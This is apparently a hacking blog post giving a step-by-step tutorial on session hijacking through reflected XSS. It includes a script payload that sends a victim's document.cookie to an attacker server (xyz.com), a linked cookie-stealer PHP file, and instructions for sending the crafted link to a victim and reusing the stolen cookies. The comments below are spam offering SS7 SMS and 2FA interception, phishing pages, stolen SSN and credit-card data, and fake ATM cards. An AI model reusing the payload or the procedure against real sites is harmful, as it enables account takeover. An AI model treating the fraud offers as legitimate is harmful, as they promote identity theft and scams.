Session Hijacking using XSS

Session Hijacking

 Session hijacking can be defined as impersonating and sending a request as a user other than yourself.
In layman's language, it is similar to plane hijacking, where a terrorist takes control of the plane except that here the hacker takes control of the session. It can be done in many ways, the most common being stealing the cookies of a user.

Procedure

 1) Find the website which is vulnerable to XSS. Let us assume that a site abc.com is vulnerable to XSS.

2) Assume that when a search (which is vulnerable to XSS) is performed on the website, parameters are passed in the url in the format http://abc.com/?s=hello

3) Now we need to save the cookies of the user.

4) Copy the code from my repository at https://github.com/rohankalra97/Session-Hijacking/blob/master/stealer.php and save it as stealer.php

5) Replace the 5th line with the url which you want the user to be finally redirected to.

6) Create an empty file with name log.txt.

7) Now push the file at your own server. Let us assume that the server at which you pushed is at xyz.com.

8) Now to steal the cookies, we need to edit the search url and add following script at it   <script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>

 9)Now we need to send the url to the user where the script is added at abc.com
http://abc.com/?s=<script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>

10) On opening the url, the user will be redirected to xyz.com and cookies will be stored in log.txt and the user will again be redirected to the url which you wrote in step 5.

11) On saving those cookies to your browser, you will get access to that user's account.

Always remember to use Kali for helpful purposes and not use it to cause harm.
Stay Safe.

Follow us on Facebook:- Facebook.com/VAPTHacker

Comments

  1. Admin16 November 2019 at 00:08

    SS7 software available to limited number of users

    SMS interception only software $100

    SMS /call Voice recording $350

    2Factor Authentication /location tracking $500

    Read and intercept SMS /phone calls / 2 factor authentications etc

    Check another person whatsapp messages

    do you have a cheating partner? let me know


    PS: this software is not be used for criminal activites
    we will not be responsible for any charges you face for involving in illegal activities.

    NO trial version, For educational purposes and for serious buyers only , do not respond to email if you have no intention to purchase

    Eail: fenzy67@gmail.com

    https://bloggerkingindia.blogspot.com/2017/03/hacking-whatsapp-with-ss7-flaw-signal.html


    I can create a fake facebook login page

    fake linkedin login page

    fake coinbase login page

    fake blockchain login page

    fake online banking login page

    fake gmail/yahoo mail and other mail login page

    learn how to use Unsubscribe options to obtain email and password

    Using hhp+html codes.... my delivery time =4hours

    informations will be delivered to you preffered email addresses

    serious enquiries only
    Strickly for educational purposes


    Eail: fenzy67@gmail.com

    ReplyDelete
    Replies
    1. No Name22 July 2020 at 02:31

      Hey Guys !

      USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
      All Leads have genuine & valid information

      **HEADERS IN LEADS**
      First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If anyone buy in bulk, we can negotiate
      *Sampling is just for serious buyers

      ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
      ->$5 PER EACH

      ->Hope for the long term deal
      ->Interested buyers will be welcome

      **Contact 24/7**
      Whatsapp > +923172721122
      Email > leads.sellers1212@gmail.com
      Telegram > @leadsupplier
      ICQ > 752822040

      Delete
  2. ADMIN 21 April 2020 at 23:11


    I provide 100% tracking numbers for different countries , including weight, shipping TO and FROM, specifics of package and all major companies, USPS, FedEx, UPS, DHL,

    It recommended for lifting paypal money on hold

    Mobile: +1 (914) 278-7320
    Mail: psoon043@gmail.com
    Telegram: https://t.me/Hackord247

    ReplyDelete
  3. Dolores Delgado1 May 2020 at 03:35

    Hi everyone, I saw comments from people who had already got Blank ATM Cards from Mike Fisher. Honestly I thought it was a scam, and then I decided to make a request based on their recommendations. A few days ago, I confirmed in my door step to have received my blank card to withdraw 12,000 euros, which I requested for business. This is really good news and I am so happy that I advise all those who need a real HACKER should contact him and who are sure to reimburse to apply through their email (text or call) +1 315-329-6320 There are sincere Hackers
    They are able to Delivered your Blank ATM Cards
    Contact Mr Mike
    E-mail: blankatm002@gmail.com
    Telephone: +1(301) 329-5298

    ReplyDelete
  4. No Name22 July 2020 at 02:31

    Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  5. ADMIN 16 August 2023 at 02:56

    I provide 100% working numbers for Whatsapp registration,
    Valid Passport/ID , Online banking login accounts, for all countries.

    Mobile: +1 (914) 278-7320
    Mail: psoon043@gmail.com
    Telegram: https://t.me/psoon

    ReplyDelete

Post a Comment

Popular posts from this blog

Sniffing Android API

Image
API Application Programming Interface aka API is a code that allows two different softwares to interact with each other. We will try to sniff Web API here. Web API are of mainly two types :- SOAP and REST. SOAP API contains only headers while REST API contains headers as well as body. Headers and body are used to send data to a server across the internet. SNIFFING If your APIs are insecure, a hacker can sniff them and modify it to cause damage to your server.  Fiddler is one of the software which allows us to sniff API. 1) Download fiddler from  https://www.telerik.com/download/fiddler  and install it in Kali or Windows. 2) Install Fiddler and run it as Admin. 3) You will see a screen like this 4)Go to tools->option->connections and check allow remote computers to connect. 5) On taking the cursor to the top right corner of the screen, you can see your the local IP address of the PC. 6) Open your android phone and enter this IP in the proxy settings
Read more

Bitcoin mining in nuclear lab

Image
Bitcoin Bitcoin is currently the world's strongest cryptocurrency with 1 btc(bitcoin) being more than $11000(As on 19th feb 2018). No wonder people are going crazy over buying it or mining it. Mining For those of who don't know about cryptocurrency mining,  mining is the process by which transactions are verified and added to the public ledger, known as the block chain, and also the means through which new bitcoin are released. Anyone with access to the internet and suitable hardware can participate in mining. People have spent crazy amount of money to build a rig to mine it. But some people like few Russian scientists who couldn't afford it or didn't want to spend money on it are trying unfair means to get a hold of it. Overview Several Russian scientists were arrested for mining at a nuclear weapon facility. Yes, you read it right, a nuclear weapon faculty. The scientists who have not been named are likely to face criminal charges. "There has been
Read more

Uber Being Sued for $13.5 Million

Image
Uber had revealed in November 2016 that hackers had stolen names, phone numbers and email ids of 57 million customers across the globe. The hackers had also stolen driver licence number of 600,000 drivers in the United States of America. While this hack was covered up for more than an year, Uber had acknowledge paying $100,000 to hackers to ensure that they do not misuse the data. The company had fired chief security officer Joe Sullivan and his senior lawyer Craig Clark for covering the same. The law According to Pennsylvania data breach law, a business must inform the victims in case of a data breach of personal information within a reasonable amount of time. They personal information may refers to first name (or initial) and last name along with social security number, driver’s license number (or state ID), or bank information along with the access code or similar codes. But no court has ever defined the length of 'Reasonable amount of Time' The Lawsuit The la
Read more